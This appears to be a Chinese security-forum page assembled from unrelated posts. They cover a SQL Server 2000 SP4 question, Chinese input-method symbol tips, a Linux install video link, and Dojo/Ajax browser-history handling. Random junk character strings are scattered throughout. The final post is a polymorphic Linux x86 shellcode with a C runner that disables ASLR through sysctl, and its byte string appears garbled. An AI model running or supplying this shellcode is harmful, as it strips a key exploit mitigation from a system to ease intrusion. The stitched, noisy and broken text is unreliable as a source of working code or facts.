返回列表 发帖

mssql server 2000安装盘如何集成sp4?

手上有一个ms sql server2000的企业版安装盘和一个SP4补丁包,想把它集成到一起,这样就可以一次安装到sql server 2000 sp4版了,可是目录没有update.exe文件,我想请教各位达人有什么办法把SP4包集成到这张安装盘上???、
8 m1 o& D$ ^( x9 P* q, ]# X谢谢

 

您可能还想看的主题:

windows server 2008做NTP服务器

mssql脱"库"子代码[.NET收藏]

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:marko1981发表,本帖发表者marko1981符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者marko1981和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

Zomplog CMS 3.9 XSS/CSRF多处漏洞[br]
6 L+ J2 u- q1 Y- h5 n" y' n
% S6 O3 o0 p. N: X3 c5 e2 e6 u0 @5 c. V7 y% v/ p# e. d

" Z) w( R) @) y5 O; a7 b2 f3 {! I. F) l: E1 c/ R  s2 \
5 N2 K8 H, L  u' I

$ G* z- c# ]* _
* R# H9 i6 _. `; t- V5 p( A9 Q3 @6 S  p. W

$ U2 N5 O4 ^: e& e& w0 n
5 ?$ p; _, P3 ~$ R/ I  \' U
+ ]* [0 n3 E$ Y) d1 O* E3 b
! I$ x) M4 E; ~- I; a5 ^  {+ A/ C5 t4 O+ R. e
( y% {* O0 [- s9 U1 r
: g9 W+ k, Q! X3 D; F% q. X/ a
2 i: p( {1 h8 k3 W
4 q8 o' l7 z: n* ~

, k, ?. T& |. ]8 O' p& N" \, `公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

九种常用输入法特殊符号功能揭密
平时经常要输入一些像“★”、“√”之类的特殊符号,或是“壹万贰仟叁佰肆拾伍元”之类的大写金额,很多朋友不知道该如何通过常用输入法快速输入,另外在使用输入法过程中,也时常会出现用五笔输入时有些字不会拆分,用拼音输入时有些字不会读音的情况,这时又该如何来快速输入这些疑难字呢?我们把大家常用的输入法汇集在一起,介绍一下如何解决这些常见的特殊输入问题。同时对于大家选择适合自己的输入法也是一个很好的参考。

, J) m2 B. [1 }9 y/ d3 L
小提示
6 K  p+ e$ f  d! l7 E, q
很多朋友在使用输入法时,会发现一些文字明明拆分或拼音都输入正确了,但就是打不出需要的字,这时你需要检查一下输入法的设置,确认已经打开“GBK”编码,通常为了减少重码,输入法默认使用的是GB2312编码,这种情况下只能输入6763个常用汉字。
1 D% `! A/ n9 ^, g$ H: b
<P align=center>五 笔 输 入 法 [/quote]
& k# F, T: O9 x1 x% g2 T4 O: \
一、极点中文
, M# C3 l! L% h, f0 D( [
1.输入特殊符号

8 j/ C" W1 X. R8 p
首先可以按下Shift+Esc组合键快速调出软键盘,按住Shift键后按动Esc键,就会在多个软键盘之间切换,按Esc键即可关闭软键盘。
% h/ ?2 k5 _4 g  {/ U" Z6 Y8 m8 b8 Y% c
极点中文把特殊符号分为22种类型,并进行了特殊编码,其编码定义的基本规则是两个字母“Z”加上代表特殊符号类型的两个声母,常用的特殊符号编码有(全部编码可查阅帮助文档):
  T! P' c; @. `- J, H# F5 L; m  X
zzbd 标点符号 zzpy 拼音符号 zzts 特殊符号

+ f  |6 Q7 Y- ]% `3 Z
zzsx 数学符号 zzdw 单位符号 zzjt或zzj 箭头符号
1 {8 t: j% W, H0 {' z0 O1 t. Q
zzys或zzy 圆圈数字 zzpp 偏旁
7 C/ M  R* F* C
例如要输入“★”符号,则可以键入“zzts”,然后根据提示条中的显示按“6”即可使符号上屏

) E2 y2 s# \; X/ i' I. `# J, C<P align=center>[/quote]4 W/ c( g. G- O* Y5 ~% V* o
小提示
* q" M* t9 i- f& D: ]3 l9 Q
我们可以在极点中文提示条上右击,选择菜单“管理工具→用户码表”来对默认的特殊符号编码进行修改,同时也可以自行添加新的编码。
3 w* o; ]1 W* _! f' h
2.输入中文日期

. S  S% l! h% Z% i- D& a: Z9 n
在极点中文中输入中文日期是非常方便的,其编码格式为分号“;”加上“XXXXnXXyXXr”,其中的X分别代表要输入的年月日数字。例如要输入“二○○五年四月一日”,则键入编码“;2005n4y1r”,这时在提示条中会显示出数字日期和中文日期两种格式,按下数字“2”即可输入中文日期了

( N/ t' u: t! C5 d
[/quote]/ Z7 g# D. Q  K. s
<P align=center>

+ p; Q5 q- }& O- i- ~! o5 x
小提示

* J8 i# Y# J. P3 K2 e+ W) f2 g
要使用该功能,需要在极点中文的基本设置中选择“快捷英文热键”为“分号(;)”才行,不过这样设置后,输入中文分号“;”就需要按两下“;”键了。
  S, Q5 z  I4 z# H7 C  n7 Y
如果想快速输入当前日期,那就更方便了,键入编码“znyr”可以输入当前年月日,键入编码“year”可以输入当前年份,键入编码“date”可以输入当前日期,键入编码“time”可以输入当前时间,键入编码“now”则可以输入当前精确时间,键入编码“week”可以输入当前星期几。
$ W: l1 c; N5 d  ~+ t: c% y9 J
3.输入大写数字和金额

  Y' K: u/ b; \: o
极点中文的大写数字编码规格是分号“;”加上数字序列,例如当键入“;12345”时,提示条中会显示三种大写数字格式(见图3),选择需要使用的格式即可,按“回车”键选择第一项,按右Shift键或“Shift+回车 ”键选择第二项,按左Shift键选择第三项。如果要输入带元、角、分形式的大写金额,则可以在输入数字后再按一下分号“;”上屏即可。例如键入编码“;12345.67;”,就可以输入“壹万贰仟叁佰肆拾伍元陆角柒分”。

* N. f% Q) n6 }: L/ W
4.难拆字辅助输入
3 A0 [6 d! F+ N, q8 `6 p
在极点中文提示条上单击右键,选中“输入法状态”中的“五笔拼音”选项,这样以后当遇到不会用五笔拆分的文字时就可以直接用拼音进行输入,而且不用切换输入法状态,最值得称赞的是,这时极点中文还会在文字后面提示出正确的五笔编码,非常方便。
" k- E7 X5 `3 E0 U; b& E) M* }
: u: @3 d; \; i
[/quote]  v" Y" T4 ~1 ~1 Q
[quote]二、万能五笔
( z6 G% W4 x* [% M$ n
1.菜单选择
  u0 @7 u, g0 ]  O8 l
在万能五笔提示条右键菜单中选择“输入特殊符号”,可以看到特殊符号类型列表(见图4),选择要输入的特殊符号类型后,在万能五笔提示条中就会显示出该类型中的特殊符号列表,用数字键选择要输入的符号即可,用“[”和“]”键可以前后翻页查找类别中的其他特殊符号。

5 o2 Q# x: x$ y, N<P align=center>[/quote]; X! W, Y* z8 v# }5 V3 H
小提示
0 L% x& [( d5 }$ M- @
你还可以直接用快捷键打开某类特殊符号,在菜单中的特殊符号类型后面提示有相应热键,例如要快速输入数字序号,按下Ctrl+2组合键即可。
. B4 B3 _$ ^9 ~$ o
2.自定义编码输入
9 z. S: l. M# j5 }8 x
万能五笔提供了特殊符号自定义编码功能,利用其自造词功能即可完成,例如想用“tsdh”来输入“√”符号,则可以先利用前面介绍的方法输入“√”,然后选中该符号,在万能五笔提示条中单击“词”按钮,并输入定义的符号编码“tsdh”即可(见图5),这里建议取消“简拼”和“全拼”编码选项,以避免重码。

( F- f  X% B. ]; a# T" l( H
[/quote]" m8 v3 N9 G4 w% u  k* E" i
<P align=center>
/ X1 L) Y) U1 |
三、智能五笔
4 J+ m( P( p# l, F; d
1.特殊符号输入

, U  G/ w. P/ z
智能五笔首创了分号“;”输入特殊符号的编码方式,使得特殊符号输入不仅方便,而且不会与汉字输入编码重码,具体编码可以查看http://www.znwb.com/help/chhelp414.htm网页中的表4-1。例如想输入“√”符号,只需要键入“;dh”即可看到提示条中的显示,按下空格键即可上屏。
. S( o; D; O# y; W; ~" j1 R) {  `
如果对智能五笔默认的特殊符号编码不太习惯,也可自行修改这些编码,方法是在提示条右键菜单中选择“辅助功能→定义字词符号→自定义符号”项,打开自定义符号管理对话框(见图6),其中每行定义一个符号的编码,根据需要修改左边的符号编码即可,当然,也可以新增符号编码,编码(不包含分号)和符号之间用空格隔开即可,要注意编码为一至二码,不能是三码或四码。
1 T6 }7 c/ c; D9 I/ B. O
<P align=center>[/quote]
  p8 a0 j2 u+ [
2.疑难字的输入

1 o2 [; o/ L/ F
对于五笔输入法来说,像“凹凸”之类的字是很难记住编码的,虽然智能五笔可以使用右Ctrl键切换到拼音状态进行辅助输入,但毕竟麻烦了一些。为此,智能五笔还提供了一种简便输入这些疑难字的方法,就是连按四下“Z”键,这时在提示条中会显示出疑难字列表(见图7),
# C& A- E2 ^; T$ e
[/quote]
$ S5 [9 X& ~. G3 X; }2 A$ O" L% m<P align=center>
1 O' V' H& o* D) s& B
例如按下数字“2”即可输入“凹”字。
1 Q6 C+ i5 d) J# M) y3 q" T4 ]% S
小提示
& n/ m, c' A* s! p- @  ?
在智能五笔提示条右键菜单中选择“辅助功能→定义字词符号→疑难字表”项,可以对疑难字表进行自定义,把自己常用的难拆的字用拼音输入进去即可。
; B' n- z  p/ c1 @# [: x
3.大写金额输入
3 m2 J9 h9 O1 }; K
在智能五笔中输入大写金额的编码规则为“分号键+引号键+数字键+小数点+数字键”。例如,当你要输入“壹万贰仟叁佰肆拾伍元陆角柒分”时,可以先按一下分号键,再按一下引号键(分号键右边的键),键入数字“12345.67”,然后按一下空格键即可。
' _& g: u1 s& j+ t5 y# ^1 f( a+ Y

$ V- ^, l! z* E: o" j! L
[/quote]
; A4 e% [+ K7 |& T+ Q" y( _[quote]四、五笔加加
0 \: j8 s) i$ W' q, s7 h' y6 P
五笔加加默认对一些常用的特殊符号进行了编码,其编码规则是该符号中文名称对应的五笔编码。例如要输入“√”符号,只需要输入其中文名称“对勾”的五笔编码“cfqc”,即可在提示条上看到提示,由于有重码,按下数字“2”即可输入。具体编码与特殊符号对应列表可以打开C:/Program Files/WBJJ目录中的“wbjj_biaod.htm”文件进行查看。
0 q" Z0 H% P, i$ d
此外,对于一些像“ⅠⅡⅢⅣ”、“①②③④⑤”之类的系列符号,五笔加加则规定了另外的简便输入规则,首先按“Z” 键,进入系列符号输入状态,然后输入系列符号中文名称对应的五笔编码,即可从提示条中进行选择输入。例如要输入“Ⅲ”,就可以先输入“Z”,再输入“大写罗马”的五笔编码“dplc”,然后按数字“3”选择即可(见图8)。系列符号的编码对应关系也可以打开“wbjj_biaod.htm”文件查看。
2 ?, W. m5 B1 O4 o2 G- [% g
<P align=center>[/quote]
2 r/ U# R( Y# ^& l- D" O
小提示

. g! Z$ H8 {8 P5 F  Z! ]0 K& q; i
单击五笔加加提示条,选择“管理工具”菜单下的“自定义编码工具”,单击“编辑单个符号表”按钮或“编辑成组符号表”按钮,可对特殊符号及其编码进行增删、修改操作。
, N/ ~* }" C9 ^9 s( \' S+ h
<P align=center>拼音输入法 [/quote]4 p2 Q1 ]5 r8 X) M# k8 G7 K, P2 }2 u
一、拼音加加

3 V3 Z: n. c1 L3 t, R% W
1.特殊符号输入
, V- S9 H! S6 a0 g0 p1 B6 T3 {
拼音加加在特殊符号输入上和五笔加加具有许多相似之处,同样采用内置编码的方式来输入特殊符号,但其编码规则是特殊符号中文名称的简拼(即拼音首字母),例如要输入符号“√”,直接输入其中文名称“对勾”的拼音编码“dg”,然后根据提示条中的提示按数字“3”即可上屏(见图9)。具体编码与符号的对应列表可以打开C:/Program Files/JJOL/IME目录中的“拼音加加符号列表”文件“pyjj_biaod.HTM”进行查看。
* l3 {* O# N% @2 w2 D& z
<P align=center>[/quote]
5 c7 R: Z3 y$ h<P align=center>[/quote]
7 @+ Q, k$ k0 s9 j8 p9 d4 ^
2.输入中文数字
9 Y+ F) w4 l: D; Q
直接输入阿拉伯数字,例如“12345”,就可从提示条中看到两种常用的中文数字格式,按下需要使用的格式序号即可。
1 \, U3 I) O+ F2 F
3.输入中文日期
. |) l& x) H$ i4 i
直接输入“98-2-3”或者“98/2/3”格式的数字,拼音加加就会在提示条中显示出两种常用的日期格式(见图10),输入序号即可上屏。

, V. p; y. G7 |) b' K) D<P align=center>[/quote]
- n1 m- h& {4 O8 X: B9 p
4.辅助输入

5 T6 P4 h+ s! g5 l9 k4 W( P. e! d
当输入文稿时,如果遇到不认识的字,可以按下字母“i”进入临时笔画输入法,然后即可按照该字的笔画书写顺序进行输入,这里的笔画输入法和手机上使用的笔画输入法类似,只不过是键位定义有些区别,拼音加加的五个基本笔画横、竖、撇、点(捺)、折分别用其拼音首字母来表示,即h、s、p、d(n)、z。例如,“殳”字可能大部分人都不知道它的读音,但我们依然可以在拼音加加中正确输入,编码是“ipzzn”,然后根据提示按数字“3”即可,而且文字后面会告诉你该字的拼音(见图11)。

/ S; `$ Z+ J/ V# A* s. }0 `) f<P align=center>[/quote]0 ?! f4 G& x8 c
二、紫光拼音
$ j# s: C. C+ M
1.特殊符号输入

* I  p- N4 w$ {0 @8 x
在紫光拼音中可以使用软键盘来输入各种特殊符号,它提供有13类软键盘符号,使用时右键单击输入法提示条中的软键盘图标,然后选择符号类型即可打开软键盘(见图12),点击需要输入的符号即可。
4 {( }& |# Q. A/ h- P
<P align=center>[/quote]( }: o) ?, L9 r% P- o! ]& m4 X
除了使用软键盘输入外,紫光拼音还允许使用特定编码输入一些常用的特殊符号,在提示条上单击鼠标右键,选择“属性设置”,然后打开“自定义→特殊字词和短语”,即可看到特殊符号的编码,当然我们也可以自行输入或修改编码,格式为“英文编码=特殊符号”,例如添加一行“dhao=√”(见图13),然后单击“确定”按钮保存设置,以后就可以用“dhao”来输入“√”了。
4 Q+ P; E+ u. ]( Q" I8 q
[/quote]# p6 V& P* l$ {8 E
<P align=center>

1 r2 B- i- ?) I8 [3 u4 ]# L+ @
小提示
+ d' Y9 |. K& L  N  y) Q4 d9 ]/ g
这里定义的特殊符号编码不能立即生效,需要重启紫光拼音输入法后才能生效。
* Q2 n" s2 X$ k
2.中文数字输入
4 B. z& `6 n& t" w+ E* T# D, r
在紫光拼音中按下字母“i”和“u”可以临时输入中文数字和常用单位,在输入时,紫光拼音要求使用特定的字母来代表数字的单位,具体如下:

4 h! |, p9 y7 k. \4 t5 l2 I/ L5 w& z
g 个 s 十/拾 b 百/佰
1 N& J6 V( K6 C# S% R
q 千/仟 w 万 z 兆

6 _  l) \6 I& z9 `
n 年 y 月 r 日
7 F; ~* Z7 ~) ], b- z. t+ f
d 点 f 分 m 秒

2 {" S, E3 e8 s% O* Y# Q% {
v 元 j 角
0 ~8 b1 k! f# q0 R2 B
其中按下字母“i”后可以临时切换到中文数字小写形式输入状态(一、二、三等),例如键入“i2005n4y1r”可以输入“二○○五年四月一日”,而按下“u”后可以临时切换到中文数字的大写形式输入状态(壹、贰、叁等),也就是大写货币金额,例如键入“u8w7q6b3s1v”就可以输入“捌万柒仟陆佰叁拾壹元”。

1 j' @" X  G, B3 D! W/ I6 P
三、微软拼音

* Z- u5 o) O. c# i: a
微软拼音的特殊符号输入相对比较麻烦一些,只能使用软键盘进行输入,这里同时也提示一下大家,对于系统自带的其他输入法以及一些标准接口输入法,使用软键盘是通用的特殊符号输入方式。

) D1 e) X' G% w* T
四、智能狂拼
: d' x: C# h* Q6 k0 |
1.特殊符号输入

. {( {- z: o1 {
智能狂拼可以很方便地输入偏旁部首以及计量单位等特殊符号。其基本输入方法是先按“Ctrl+[” 组合键进入特殊符号输入状态,然后按照下面的特殊符号类型编码进行输入,其编码规则是取其中文名称前两个字的声母。
% j$ w' Y) J1 ]% \5 j% r8 i, y1 c: t& }
部首=bs 数学符号=sx 数字序号=xh
/ O: \1 d- g5 C2 r* ]  Y
特殊符号=fh 计量单位=jl 标点符号=bd
' W0 y2 a4 {; ~: g# J% N
箭头符号=jt 希腊字母=xl 日文字母=rw

8 A) S/ p! P6 ^+ ]
罗马字母=lm 拼音符号=py 注音符号=zy

0 R) F& k" \* B
天干地支=tg 俄文字母=ew

) M0 t+ Z0 q2 `$ C! n  Y
[/quote]: ^# F; j4 {6 i+ [9 N4 T
[quote]例如要输入数学符号中的“√”,就可以按下“Ctrl+[”后,再按“sx”,这时在提示条中会显示出数学符号列表,不过当前显示并没有出现“√”,需要翻页才能出现,这里有个技巧,你只要继续输入特殊符号读音的第一个声母,就可以缩小提示条中显示的符号范围,这里我们再输入“d”,就可以在提示条中看到“√”了。
; i% i# I: V7 k/ F
2.疑难字和偏旁部首输入
; r  y$ T5 G0 Z# Z
对于不认识或不能正确发音的字,智能狂拼也提供了笔画辅助输入方式,其五个基本笔画对应键位和拼音加加完全一样,输入方式上则需要先按“Ctrl+[” 组合键进入特殊输入状态,然后即可按照该字的笔画书写顺序输入编码,利用这个方法也可以直接输入偏旁部首的笔画顺序,这要比使用前面的“bs”再选择部首的方法准确一些。

) Y0 Z  y2 m, k1 U
五、龙文输入法
1 C8 ^  B" ]3 `' y- @" `( q" L
在特殊符号输入上,它也提供了和标准输入法完全一样的软键盘输入方式,同时还提供了非常方便的自定义编码输入方式,不过默认并未启用这个功能,需要在提示条上右击,选择“系统设置与管理”,然后单击“系统管理”选项卡,选中“批量添加词组或用户自定义词库到用户词库”选项,并在“编码方案”中选择你习惯使用的输入法选项(见图14),单击“浏览”按钮,在打开对话框中选择“自定义编码”文件,最后单击“开始执行”按钮即可。

& c# m7 r% F9 Y: R3 c/ q<P align=center>[/quote]5 D; T! B& \2 b6 }; s
这里的特殊符号编码是龙文输入法默认设置好的,一般是以特殊符号中文名称的声母作为编码的,我们打开“C:/Program Files/龙文输入法平台”目录下的“自定义编码”文件,就能看到这些编码的定义了,当然,如果你想修改这些编码设置,只需要修改这个文本文件即可。
9 x5 Y% ], W) G9 B$ p, J% b: F  c& k

% U: r  Y6 E* d+ G
/ g* U2 Z4 b" d* p( U1 Y# l: w+ k4 _3 ]! K

  p/ p5 c  w$ K! r. ^8 K( X: b3 n# k

! G5 n& X8 L" R* n& h2 y( K' ~: y7 l* B% U9 p% [, o

, N0 J8 u+ M/ h9 P  V
4 ]& q2 n% }8 |; S
  P( }3 P) ?* d3 u- m1 T9 J& Y3 K# {9 k

, a  b7 l' F( A) J2 f# ]8 \
* f2 |; E8 w1 x
; W6 t$ x9 q) g7 C% W- f# r* w4 h8 h8 [
9 |6 f! A" D5 m2 ^6 }4 A8 x7 l% z9 y4 i2 f1 e: g  W1 M; Z# b

0 ]# v* E, z1 t, \, p- E
3 N1 I( n5 o$ I9 U) M! K公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

手把手教你装Linux系统-启动红旗Linux5.0
<P align=center>
( }$ h$ q) `* ?2 F3 F
4 j& e( F. `/ C, W  b! Z8 X+ Hhttp://www.sitedir.com.cn/video/7.swf[/quote]; P. g* Z2 W* H4 j+ D

9 o- k, ^- Q$ ?0 \6 d
% b! _: Z. l% X5 H- t0 _1 Z: t1 }  x

) x' Z) p; L' q5 a3 K! t6 S3 f6 o+ V& t
+ ]0 G9 x( y7 B3 J  D3 ?# Z/ W8 q8 p' K: T: C; m
( s) b1 W8 p2 M" T& }

  i) Y4 O" R# x7 B9 `- l  ]
7 N0 M* t) Z! j$ g: ^# y0 c
1 f% q7 K) B$ x' ?5 @' X
2 J# R4 X" E( V
7 H# V8 `. G1 n9 o/ F6 b
5 R  p! j+ W7 S% e: [1 i6 a" G: J$ F

3 E6 k: V0 X! D# K
/ z- K) t: C9 O: V# }4 g# A7 |0 @2 |; ~3 A  x' z6 J( N3 {, [. R6 I
( }3 D; ?' @0 p& v) ]% i) C- H
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

关于Dojo和Ajax程序的浏览器History控制的研究
web应用程序都面临浏览器上的history功能的困扰,前进,后退,刷新,将是你的程序失控,重复提交,丢失数据等等场景让你焦头烂额,运行的好好的程序,被客户随便摆弄一下就错误百出。这些就是客户心智和程序员心智不同产生的冲突。
7 Z. [9 M2 E, D4 U2 U7 q
最初的web程序只是一些静态的网页,一般都通过地址栏的URL地址来进行定位,所以,浏览器集成了很方便的History功能,让你在浏览的历史记录中来回切换。可是,随着复杂应用程序开始越来越多的通过浏览器来作为客户端,噩梦就开始了。
) w- W9 P' F4 `+ Z/ {! H. H6 ?
近年来,Ajax技术的兴起为程序设计者和客户提供了不同的技术实现和用户体验,Ajax火了起来,也开始颠覆了传统的web操作和应用传统。但是浏览器并没有相应的来迎合这些变化,这样的话, Ajax 程序也同样的面临浏览器的干扰,而History功能就是其中让人头疼的一个。

; \6 s& }* X# k; {1 x
越来越多的程序员面临这个问题,开始考虑解决之道,解决的方案五花八门,不过都这能解决问题的一部分,无法从根本上解决这个问题。要根本解决这个问题,只怕需要浏览器的厂商和标准部门针对Ajax一起来想出一个标准化的处理方式。

: V$ A8 w1 _* S% W9 q
当然我们没有时间来等待别人来帮助我们解决问题,我这里介绍一下Dojo 解决这个问题的方法,同时研究一下它的实现原理。

& ?! R9 `# Q7 A6 V  {/ _7 M
需要解决的问题Ajax程序进行页面内容变化的时候,并没有刷新整个页面也没有改变浏览器地址,所以如果进行以下的操作将会出现无法意料的问题:
% E% E2 w0 `: D# @+ o9 t* H8 C
行为案例:1search 页面--2search-->3显示列表在本页面--4点击列表中的某条记录--5页面切换-->6所选记录的详细内容页面-->7编辑并保存-->8停留在原页面,提示保存成功-->9返回--.10页面切换-->11search页面

. ~" P8 l6 V' k/ r, K
上面的步骤都不会导致浏览器地址变化,因为我们的应用是单页面的frame。
) l. h( E4 G2 [) t8 ^0 P- ]! R6 V
这个案例涉及到两个页面(黑体 1,6),4 个动作(红色 2,4,7,9)
$ M2 H/ W$ u% C& N& L% v
后退/ 前进: 如果在step6的时候,如果浏览器的后退按钮可以点击的话(一般如果你之前没有访问过别的url,那么将不会有后退地址),将不会回到3或者1,而是1之前你访问过的地址。
" d* `: F8 o8 L" }; T  k
刷新:如果在step6的时候,你点击刷新,将不会刷新step6所在的页面,因为浏览器的地址没有发生变化,你会发现,页面刷新之后来到了step1.
  ?& p* f1 s8 x+ r9 D8 t
收藏: 同上,你收藏的step1所在的页面。
: A- [" e/ v  a
客户看到他花钱买的程序却是这样的行为,客户岂不是要疯掉!!!
+ y& q8 K, g* Y" b9 W
解决之道1. dojo

5 k& k0 a2 Y7 N0 }3 k
dojo1.0 提供dojo.back 对象来处理这里问题,可以记录页面状态到一个堆栈对象(historyStack)中。但是这个historyStack开始是空的,当我们进入的首页的时候,可以通过setInitialState 方法设置他的第一个状态,如
4 y- Y5 |: w/ t+ ], C/ {; A) o
js 代码dojo.back.setInitialState(currentState);   

) i: t7 b* q$ g
之后每一次页面状态变化,你都可以将这个状态用书签记录下来,如
8 \* t9 Z  t4 a# r1 O9 b
js 代码dojo.back.addToHistor(currentState);   
2 x/ _% p. ^5 n7 S+ |/ m+ g; r
state 代表你需要记录的页面状态,一般包括下面几个属性:
$ ~  q2 v0 j  h5 P  [
back 函数  //当用户点击后退按钮,并且跳转到这个状态的时候将被调用。forward 函数  //  当用户点击前进按钮,并且跳转到这个状态的时候将被调用。changeUrl 布尔类型或者字符串 布尔类型指示是否为当前状态创建一个唯一的hash值 如果是一个字符串,那么将使用这个字符串而不是hash值。
( \1 Q7 k- S4 C0 ^" E2 r# N& N# [
var state = {        back: function() { alert("Back was clicked!");          dojo.back.addToHistory(repeatState); },        forward: function() { alert("Forward was clicked!"); }     };   

. f: }) ~( u8 R3 S; m
dojo 的back对象将会在用户点击浏览器后退按钮的时候自动将当前state从historyStack中Pop出来。同时进入到前一个state。
7 E) d) w+ I6 e& Y- \# }2 ]
下面摘选自dojo库的back.js

; l0 y3 J" x  g; f( `' m9 M: h
js 代码function handleBackButton(){            //summary: private method. Do not call this directly.               //The "current" page is always at the top of the history stack.            //console.debug("handlingBackButton");            var current = historyStack.pop();            if(!current){ return; }            var last = historyStack[historyStack.length-1];            if(!last &amp;&amp; historyStack.length == 0){                last = initialState;            }            if(last){                if(last.kwArgs["back"]){                    last.kwArgs["back"]();                }else if(last.kwArgs["backButton"]){                    last.kwArgs["backButton"]();                }else if(last.kwArgs["handle"]){                    last.kwArgs.handle("back");                }            }            forwardStack.push(current);            //console.debug("done handling back");        }   
$ P2 Y1 {" L3 S8 z$ s: [3 X* K
完整的例子,请看dojo1.0的发行包里面的back.html(dojo/tests/back.html),里面有完成的例子。

# l4 B2 {5 x! v

0 \, Q. P5 F' x/ R
dojo怎么控制到后退按钮的呢?怎么记录书签,其中的奥妙何在呢?那就要看iframe在这里起到什么作用了。
9 C% I4 A. y8 Q, r9 r1 S

0 f4 v1 R" g  f; K5 q; i% f
2.  利用iframe 了控制每个页面的书签(bookmark)

5 A$ y% u, {6 e! Y
在页面地址没有变化的情况下,怎么记录书签呢?怎么样让用户能够收藏呢?如果要能够收藏,地址一定要变化,但是地址变化的时候又要确保页面的内容不发生变化。How to do?

) n  _& R$ g% L4 H
Yes, Use # , 增加书签到地址后面,如: http://yourdomain/yourpage#bookmark 这样的话,地址栏变化了,那么后退按钮也就有了历史记录了。别高兴的太早,Ie并不是这样。Ie并不会将http://yourdomain/yourpage#bookmark和http://yourdomain/yourpage认为是两个页面,所以也就不会加入到History中,怎么处理这个问题呢?iframe在这里派上作用拉。通过设置iframe的src属性可以让Ie将这些状态记录到history中。
! s/ m  D9 r% `& `) o' x% r" V5 G$ X
# _0 P% J; r9 Q4 b
参考:http://www.contentwithstyle.co.uk/Articles/38/fixing-the-back-button-and-enabling-bookmarking-for-ajax-apps

4 _& U# t$ [$ G! x' A
http://codinginparadise.org/weblog/2005/09/ajax-history-libraries.html
$ V3 O9 W- X; E; S. C0 |  i

$ i$ k; D8 n' R0 c" u! K' k/ d; b
" S4 g6 e) S: g: `- n5 a) D

9 N* g, E, W  A  x. `0 y/ o3 N4 o  ]! e5 E/ _7 @$ t

: R4 W, `1 X( ~: m5 d1 C
( H% L4 F5 U4 M7 P/ Y7 S/ n
. O) ^  q" m! R8 h( A$ {5 u
) w, C, |/ t! S2 i2 Y/ U
- f5 D5 e$ U* y3 P
4 O2 _8 c! N; ], C. K4 ?# J1 C/ f1 N3 p% \0 @
" U2 y6 }. x0 P; T

7 c5 G1 X  @/ q7 T3 d% a7 l$ U+ T+ l& g% c2 h* \& q/ T) n
/ a) N, B3 Q. T' d: ~

  n9 D9 n1 g+ ]# r5 N. R- \! k' r: t; k- U& l- B2 U/ A

( k7 ]+ Y. z! H$ `7 c% L; G* n# Q7 j% }% n
% i* i% F0 E/ J, |$ B7 o5 q1 @7 A
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

linux/x86 sys_execve 121 bytes shellcode
/* sys_execve("/sbin/sysctl", { "/sbin/sysctl", "-w", "kernel.randomize_va_space=0" }, NULL);% x  _3 R# g# I$ e' S* `) y& v$ J
* 121 bytes polymorphic shellcode1 f9 A+ @- \# p& u1 U
* Programmer : Paulus Gandung Prakosa_ (syn-attack): m( _7 i& Z* ?& M( h
* Thanks to : mywisdom, gunslinger_, nofia fitri, chaer.newbie, wenkhairu, ketek, xtr0nic,
4 {# V0 |2 [6 d; i *             supermen ganteng, and all devilzc0de members
$ X: ^. C) W& o/ n, ^ */

, [" }6 R' {2 g7 A- R
/*. P2 X' ~; K; u! z  ^1 O
* Tested in : ' p+ U, J' ^' i/ Q# `! Q
* - BackTrack 5 (linux-2.6.38-generic)
" g1 d/ r" n6 w( O * - Ubuntu 10.10 Maverick Meerkat (linux-2.6.38-generic)  J) [# K( o3 {* }
* - Ubuntu 11.04 Natty Narwhal
) Y0 z# E, g' F& n# j4 \. E4 I9 \: ~ * - Debian Squeeze 6.0.2 (linux-2.6.32-5-stable)
) p- o. G3 D9 ?% G * Note : Be sure to disabling ASLR (Address Space Layout Randomization) first before
8 ~9 w- S2 @7 ^3 d2 k( S' ? *        placing and executing our shellcode# i. _% D) E& P2 z# B& S
*/
+ [; O  F# E9 f! S
#include <stdio.h>
' j) G3 o/ V4 Q7 N: I0 f9 u#include <string.h>

( B9 L/ f) n9 k% }8 |
char null_space[] = "xebx0dx5ex31xc9xb1x65x80x36x7e"
) g) P+ }- B" A: B      "x46xe2xfaxebx05xe8xeexffxffxff"! h' ^9 b( Y/ B! F
      "x4fxbexfdx92x7fxf6x7ax5ax16x1d"
( g9 A6 j5 K0 O+ O( W7 @* z3 t. ?( a      "x1bx43x4ex16x21x0dx0ex1fx16x1b"
- \" Y# t. ^- z      "x21x08x1fx16x11x13x17x04x16x0c"- r7 R5 E& K" U# m
      "x1fx10x1ax16x10x1bx12x50x18x16"& V+ P; W4 S) K5 S6 x
      "x1bx0cxfdx92x7fxb8x7ax5ax15xf7"
: `5 x7 D& d6 k6 t      "x98xfdx92x7fxf6x7ax5ax18x16x53"+ [- k, b( d3 f$ y1 E6 m( Y" n
      "x09xfdx92x7fxf6x7ax5ax16x0dx1d"
. n5 [( s; r  A. B' O& z, P      "x0ax12x16x10x51x0dx07x16x51x0d"
4 b3 P! D# J6 E  M* v      "x1cx17xf7x9dx2ex28x2dxcex75xf7"/ ~  G, n+ G0 Y/ \( M3 c/ u
      "x9fx4fxacxb3xfex4fxbexcex7fxb3". Q% }! b  n& b* o
      "xfe";

1 Y) ]) B5 \2 c  g  @) i) b5 |
int main(void) {
/ J, p8 u: l7 V  int null_len = strlen(null_space);
" ^7 c( Z3 k+ B4 q3 M/ N5 z5 ]: V  printf("[+] Using key mutation engine : 0x7e
  i2 A8 G. D3 C' ?");
" G% l/ K$ w, S( G. Y& S  printf("[+] Length of this shellcode : %d bytes* D% X: g$ H) q7 F9 l: ?+ ^
", null_len);$ Z1 Q! V% i1 v/ t
  printf("[+] After executing this code, please check the value of "/proc/sys/kernel/randomize_va_space"0 S! w! s; `5 [: D
");& y3 T* J. V. H7 i+ r6 V, @
  (*(void(*)())null_space)();
0 ]5 @  f5 `+ l; k* j7 o  return 0;
) T% {+ h/ g4 g' d/ Q( ]}

; `3 h3 D0 D" S& r; w
